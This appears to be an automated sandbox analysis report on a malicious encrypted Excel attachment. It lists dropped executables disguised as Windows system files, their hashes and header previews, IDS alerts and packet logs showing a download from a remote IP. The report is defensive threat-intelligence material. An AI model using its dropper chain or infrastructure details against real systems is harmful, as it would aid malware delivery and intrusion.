C:\Users\user\AppData\Local\Temp\Cab820C.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\Local\Temp\Tar820D.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.309740459389463
Encrypted:	false
SSDEEP:	1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
MD5:	4E0487E929ADBBA279FD752E7FB9A5C4
SHA1:	2497E03F42D2CBB4F4989E87E541B5BB27643536
SHA-256:	AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
SHA-512:	787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........\|h....210303062855Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\icsys.icn.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211759
Entropy (8bit):	6.104338436807435
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unR:zvEN2U+T6i5LirrllHy4HUcMQY6a
MD5:	D5809935B2F8A4579AAADCA96C2920EE
SHA1:	1371253A9877420D37FB912C5C80C0F63871FBCE
SHA-256:	F6B230F7A36830E443AEAF69C1826F3188C8C2247C6711D0148E12EC5A29DBB1
SHA-512:	3F1ECFF56C7687FD5EC726DBFC2BC1914942C8675169EC8B039D79DE5A050BBA4CD850DF95C836618B6D8F55E160A139836C90E8474CEE0B36247DA8F51F6287
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\stsys.exe Download File
Process:	C:\Windows\system\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211745
Entropy (8bit):	6.096337396978878
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unV:zvEN2U+T6i5LirrllHy4HUcMQY6e
MD5:	8E5F26D6D4D9DE99AD74A5D8B69966FE
SHA1:	2C2910DE330FA29250B419E6C44948F7AD9DE1AA
SHA-256:	295D050B2163C771DA9BEECE826B9840E4A9F952F96D2CC995FF72B6E4BDA935
SHA-512:	8509EAAB848C914A520BDCD5F73D5BF0E0BF59C9CB6EB5913636F501465E53AA961D3ACC58B0B65EA63D4EB400524D32BAB5B354DA62573FF138B5B798E6B1A4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\mrsys.exe Download File
Process:	C:\Windows\system\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211801
Entropy (8bit):	6.116067105943455
Encrypted:	false
SSDEEP:	6144:zvEN2U+T6i5LirrllHy4HUcMQY6F77777777777777777777777777777777777S:zENN+T5xYrllrU7QY6Q
MD5:	CBEA61998933A61262C84DBB3C5BA31B
SHA1:	98E7D8E171476B54822D1315C11828122937CB34
SHA-256:	06CB78FB0C7C00D330A1FEB837D3751E2239BB898F70DB7EA30BC1FB0B440BB7
SHA-512:	69F32312BAC339CFC92AA0739729559F23E83851DC1CAA312A9AE0F2B7275C957494C98CE39BA8F0AB9EBEA18B449C1B8C0C04CEFF5D343DDA0939EFFF79F7F8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Required Order Quantity.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	379720
Entropy (8bit):	5.8128747167355925
Encrypted:	false
SSDEEP:	6144:zvEN2U+T6i5LirrllHy4HUcMQY6ZOaoi7ru0qFkBYDoogRI30z0noojfIVAdayb1:zENN+T5xYrllrU7QY65oiHuhGYDoogR0
MD5:	AD0C93B574BB947CFF15483EDA82811E
SHA1:	AD379C5A86BF646C4A079E737A364AB352107E5B
SHA-256:	BCAAC39113BD17158FE86A77328F97E9C3FA14860C9C4449A8AE0768C85243F4
SHA-512:	B31231362967089A28F24F84DFD185FDB9E2FC940EABD112BEFF03968993F9D7A820ADC1DB83A6775A3473C8FF2FAD8D067C7CA16B4A7E7C57337450BEDFC109
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\vbc.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	167936
Entropy (8bit):	5.217490030056356
Encrypted:	false
SSDEEP:	3072:/wbOaoi7MALuifOWr9/yPFk9vYDoogRIBN0z0noojfIVAdaybDIEaIJqAT15MMbD:mOaoi7ru0qFkBYDoogRI30z0noojfIV/
MD5:	ABBFBEC83B67CA488DF807F74D5773B7
SHA1:	657177EB270DAB50FB19A14656EAB098E318B152
SHA-256:	446FFBE53145C93AC0D5F2201A7602846D272FD772936583125B0BD0D331D04A
SHA-512:	4A6DB34610B786F711BB231620D7AFAB20DC4453F036736812772E16148E0BAD8A64A50347A9BB34B9028796A13DABEA95302C2A2D265A4B7AF0A613B754F026
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L......V.................`... ......\........p....@.................................M........................................a..(.......p...................................................................(... ....................................text...8W.......`.................. ..`.data........p.......p..............@....rsrc...p...........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\system\explorer.exe Download File
Process:	C:\Users\user\AppData\Local\icsys.icn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211903
Entropy (8bit):	6.092072244322942
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unQ:zvEN2U+T6i5LirrllHy4HUcMQY63
MD5:	65343007BC733953C401ADFE6E510AB7
SHA1:	4A1FF89EF9993E06183A8E704E77991C189C2106
SHA-256:	1136B874FC6C8F9D80B949A472EB200A1F9FECD71C1AB8BD801FBA14D4610CB1
SHA-512:	E7AD8BB83680FEAEF184549630B99FE8E36EB541D72C9AB28B9E06B29BA32BC2A9BB914CC46DABBCF6460DE417A2ABF8A999043BCA879D2AF137DA94F00B8F52
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\system\spoolsv.exe Download File
Process:	C:\Windows\system\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211748
Entropy (8bit):	6.094422228145652
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unk:zvEN2U+T6i5LirrllHy4HUcMQY61
MD5:	817B37415965598BD5AF7AC6AC9A486B
SHA1:	1337DF006CCC5D6EDFE929B97ABEC18C83C78831
SHA-256:	30DA807F99B8A8D041325AFBB56B731AFB0B8728F523608E3ED4F351E717465A
SHA-512:	EFC47D051BC2F6710AEB4B57F00449DBB4C36EA14BF33201F634E18C827616F5749BC8611BAD3E85F5B8464DB8E3CC9EC1EBDF616C4E112F21BC5041E3DBBAFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\system\svchost.exe Download File
Process:	C:\Windows\system\spoolsv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	211773
Entropy (8bit):	6.088871980710419
Encrypted:	false
SSDEEP:	3072:zvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unF:zvEN2U+T6i5LirrllHy4HUcMQY62
MD5:	9E2126D03A69C95E6FAE5281AA482ACC
SHA1:	D7848F25AE28BC4A2F20DF7660A1C78039154613
SHA-256:	47EC60C36874B3618BF7EC1EEA15E49DD9C3CC1ED87304C10F682DE0A0E3E2F8
SHA-512:	DC669E2C770324AE6D32D2DB0EFC2DB431C3A276098F17A2DFEA923683DB0F54FF44C7A1A1983E6D8ED86220F1ACDBEE7059373BDFE273BA1ACF31C4FF664DEC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@............................................................................(...........................................................................(... ....................................text...(........................... ..`.data...t...........................@....rsrc...............................@..@$..G............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996654823675753
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Required Order Quantity.xlsx
File size:	2496512
MD5:	0bbf60240e66e82ba4adf5d8e9b61ba0
SHA1:	d9d2142b4b34e3aad4020dd4d2ee918bd7d34847
SHA256:	3b4f801135ba694a061a4608da04b1c0935f090b7b4c540bcace9b1bd1eecb9a
SHA512:	786a4ba62a18ed2015df60cdcf374689baf03d4a6d4ae228f5f028ea79921ed5c5cc8446bafae01b9220b902ad4cc92369b6417989b6487ddf6fd4446713efc9
SSDEEP:	49152:pfLUFrbLpBmyvdK72GOAzkZhMUC+7cr+opxXEHGFPrwnnd0Vn:pFHXOqyhMT+7e+ofX5rwnnqn
File Content Preview:	........................>...................'....................................................................................................................................... ...!..."...#.......~...............z.......\|..............................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Required Order Quantity.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2472728

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2472728
Entropy:	7.99991075725
Base64 Encoded:	True
Data ASCII:	. . % . . . . . Z Q . m . b . . $ 1 . Z l . H . { . . . S . p . < . ) O ^ . . . . . . _ . . . m . . . ` . . . . . . . q . D . . M . . . . . t " . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . . . d . . . . P ^ . . . . . r . .
Data Raw:	07 bb 25 00 00 00 00 00 5a 51 98 6d f8 62 10 e1 24 31 00 5a 6c c1 48 85 7b d6 ae 91 53 cc 70 c5 3c b3 29 4f 5e f8 f7 df fa 82 98 5f 1a 05 1d 6d 18 d9 b2 60 19 93 a3 f5 d5 b5 a8 71 a7 44 8e a3 4d da df 9e f0 f2 74 22 c5 b5 cd 80 f7 72 ea 9f ad 64 d3 91 1d 86 50 5e c5 b5 cd 80 f7 72 ea 9f ad 64 d3 91 1d 86 50 5e c5 b5 cd 80 f7 72 ea 9f ad 64 d3 91 1d 86 50 5e c5 b5 cd 80 f7 72 ea 9f

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.52262236603
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . u h . . . T . . . r $ . O i . z . . . . i . r T . . . ) V . . . . . r . < . . . . ^ U . . . . . . . . < . . . . . . . D . . . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/12/21-07:47:20.629703	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49168	80	192.168.2.22	103.141.138.118
04/12/21-07:48:45.072383	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49178	34.102.136.180	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 07:47:18.325778961 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:18.367883921 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:18.368014097 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:18.384125948 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:18.426276922 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:18.427957058 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:18.427997112 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:18.428005934 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:18.428097963 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:18.435009956 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:18.476782084 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:18.476897955 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:20.256257057 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:20.312553883 CEST	443	49165	52.59.165.42	192.168.2.22
Apr 12, 2021 07:47:20.312827110 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:20.394503117 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:20.629017115 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:20.629300117 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:20.629703045 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:20.864182949 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:20.864227057 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:20.864257097 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:20.864285946 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:20.864314079 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:20.864356041 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.098994970 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099025965 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099041939 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099059105 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099075079 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099091053 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099107027 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099123955 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.099163055 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.099200010 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.339812994 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.339874029 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.339904070 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.339941978 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.339989901 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.340027094 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.340068102 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.340106010 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.340106964 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.340148926 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.340152025 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.340154886 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.340174913 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.341468096 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341509104 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341547012 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341557026 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.341587067 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341590881 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.341633081 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341675997 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341689110 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.341712952 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341727972 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.341751099 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.341764927 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.341794968 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.344059944 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574173927 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574235916 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574275017 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574316025 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574353933 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574376106 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:21.574390888 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:21.574402094 CEST	49168	80	192.168.2.22	103.141.138.118
